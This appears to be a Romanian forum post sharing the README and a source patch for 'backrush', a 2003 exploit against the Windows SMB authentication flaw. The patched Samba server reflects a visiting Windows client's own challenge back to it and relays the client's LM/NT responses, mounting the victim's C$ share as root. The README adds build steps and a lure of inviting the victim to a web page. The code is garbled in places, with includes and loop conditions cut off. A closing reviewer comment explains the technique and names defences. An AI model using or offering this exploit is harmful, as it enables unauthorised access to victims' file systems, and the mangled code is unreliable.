
Shineva o inshercat sa se pricaleasca din *nix de iuzerii din windows cu sharefacku ista ? :)

Shineva o inshercat sa se pricaleasca din *nix de iuzerii din windows cu sharefacku ista ? :) * README * ########################################### Exploit for "Authentication flaw in Windows SMB protocol" ############################################ Release Date: # April 24, 2003 # # Code by Haamed Gheibi (haamed@linux.ce.aut.ac.ir) # Salman Niksefat (salman@linux.ce.aut.ac.ir) # # Systems Affected by this exploit: # Windows 2000 (SP0 SP1 SP2 SP3) # Windows XP (SP0 SP1) # # EXPLOIT PROVIDED FOR EDUCATIONAL PURPOSES ONLY AS A PROOF OF CONCEPT # WE TAKE NO RESPONSIBILITY FOR USE OF THIS CODE. ##########################################This exploit is based on samba-2.2.8a, you can download the source code from:http://us1.samba.org/samba/ftp/samba-2.2.8a.tar.bz2or other mirrors.First you should configure and make samba source code as follow:You need first to extract the file:$ tar -jxf samba-2.2.8a.tar.bz2$ cd samba-2.2.8a/sourceHere you need to configure with suitable options. Here is a config for RedHat 9:$ ./configure --sysconfdir=/etc --with-codepagedir=/usr/share/samba/codepages--with-lockdir=/var/cache/samba --with-configdir=/etc/samba$ make$ make bin/smbmount$ su# make installFirst add an arbitary user to samba: (Choose a reliable password for it for your protection!)# smbadduser smbtmpuser:rootNow check if your samba server(bin/smbd) and client(bin/smbmount) are working, and that ipchains rulls are not set. you can use:# service smbd stop# bin/smbd -i# ipchains -FWell, now if everything works fine, you can apply the exploit code to the source.Download it from: http://seclab.ce.aut.ac.ir/samba-exp/exploit/backrush.patch# patch 2. Invite him/her to visit your personal web page.You can make it by the above tag, then pray and wait until he/she visits your page. ;)Enjoy! 
* backrush.patch * diff -Nur /root/samba-2.2.8a/source/client/smbmount.c /backrush/source.exp/client/smbmount.c--- /root/samba-2.2.8a/source/client/smbmount.c 2002-04-30 17:56:19.000000000 +0430+++ /backrush/source.exp/client/smbmount.c 2003-04-19 16:28:04.000000000 +0430@@ -26,6 +26,10 @@#include #include #include +//>Backrush+int br_read[2], br_write[2], br_pid;+struct Backrush br_state;+//Backrush+ {+ int i;+ printf("challange: ");+ for (i = 0; i cryptkey[i]);+ fflush(stdout);+ memcpy(br_state.challenge, c->cryptkey, 8);+ br_state.status = 1;+ write(br_write[1],&br_state, sizeof(br_state));+ printf(" sent to server\n");+ printf("waiting for response...\n");+ fflush(stdout); + }+//Backrush+ printf("Started to mount %s on %s\n",argv[1], argv[2]);+ fflush(stdout);+ if (getenv("BACKRUSH_READ")) + br_read[0] = atoi(getenv("BACKRUSH_READ"));+ if (getenv("BACKRUSH_WRITE"))+ br_write[1] = atoi(getenv("BACKRUSH_WRITE"));+//Backrush+#include +#include +struct Backrush+{+ int status;+ char ip_address[20];+ int port;+ char username[256];+ char sharename[256];+ char netbios[256];+ char domain[256];+ char challenge[8];+ char nt_resp[24];+ char lm_resp[24];+};+extern struct Backrush br_state;+extern int br_read[2],br_write[2],br_pid;+//Backrush+ {+ int i;+ read(br_read[0],&br_state, sizeof(br_state));+ printf("received response:\n");+ fflush(stdout);+ memcpy(pword, br_state.lm_resp, 24);+ memcpy(ntpword, br_state.nt_resp, 24);+ if(br_state.username[0])+ strncpy(user, br_state.username, 24);+ printf("username: %s\n", user);+ printf("lm response: ");+ for (i = 0; i outbuf,'\0',smb_size);diff -Nur /root/samba-2.2.8a/source/smbd/negprot.c /backrush/source.exp/smbd/negprot.c--- /root/samba-2.2.8a/source/smbd/negprot.c 2003-03-15 01:04:49.000000000 +0330+++ /backrush/source.exp/smbd/negprot.c 2003-04-24 13:37:19.000000000 +0430@@ -180,6 +180,45 @@doencrypt = ((cli->sec_mode & 2) != 0);}+//>Backrush+ {+ srand(time(NULL));+ pipe(br_read);+ pipe(br_write);+ br_state.status = 1;+ 
br_state.port = random();+ strncpy(br_state.ip_address, get_socket_addr(smbd_server_fd()), sizeof(br_state.ip_address));+ strncpy(br_state.sharename, "c$", sizeof(br_state.sharename));+ {+ char tmp[1024], *ptr;+ FILE *fin = fopen("backrush/ip2sharename.map","r");+ if (fin)+ {+ while(fscanf(fin, "%s", tmp) > 0)+ {+ ptr = strchr(tmp, ':');+ *ptr++ = 0;+ if (!strcmp(br_state.ip_address,tmp))+ strncpy(br_state.sharename, ptr, sizeof(br_state.sharename));+ }+ fclose(fin);+ }+ }+ if (!(br_pid = fork()))+ {+ char cmd[1024];+ snprintf(cmd, sizeof cmd, "mkdir -p backrush/mnt/%s-%d", br_state.ip_address, br_state.port);+ system(cmd);+ snprintf(cmd, sizeof cmd, "export BACKRUSH_READ=%d; export BACKRUSH_WRITE=%d; ./smbmount //%s/%s backrush/mnt/%s-%d -o username=root,password=let_me_go_in >backrush/log/%s-%d",+ br_write[0], br_read[1], br_state.ip_address, br_state.sharename, br_state.ip_address, br_state.port, br_state.ip_address, br_state.port);+ system(cmd);+ snprintf(cmd, sizeof cmd, "echo smbmount compeleted >>backrush/log/%s-%d", br_state.ip_address, br_state.port);+ system(cmd);+ _exit(0);+ }+ }+//Backrush+ read(br_read[0],&br_state, sizeof(br_state));+ memcpy(buf, br_state.challenge, 8);+//Backrush+ memcpy(br_state.nt_resp, nt_pass, 24);+ memcpy(br_state.lm_resp, lm_pass, 24);+ write(br_write[1],&br_state, sizeof(br_state));+// waitpid(br_pid,NULL,WNOHANG);+ return(False);+//Backrush + strncpy(br_state.username,user,sizeof(br_state.username));+ strncpy(user,"root",sizeof(br_state.username));+//+int am_parent = 1;/* the last message the was processed */
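Review bot: The smbd/negprot.c hunk carries no comment saying what the added block does, and anyone auditing this patch needs that stated. The block takes the connecting client's own address from `get_socket_addr(smbd_server_fd())` and forks an `smbmount` back to that address, and the later hunks appear to copy `br_state.challenge` into the negotiate reply and hand the client's `lm_pass`/`nt_pass` back over the pipe, so the client answers a challenge issued by its own server. I would put a comment above the block such as `/* reflects the peer's own challenge back to it; relies on the peer not requiring SMB signing */`; the signing dependency is my reading of the protocol, not something the patch states. For defenders the observable pattern is an outbound SMB session from a workstation followed at once by an inbound session to that same workstation from the same remote address, and requiring SMB signing together with filtering outbound SMB at the perimeter are the usual controls. The file headers of the hunks after negprot.c are lost on this page, so which files they patch cannot be confirmed from here.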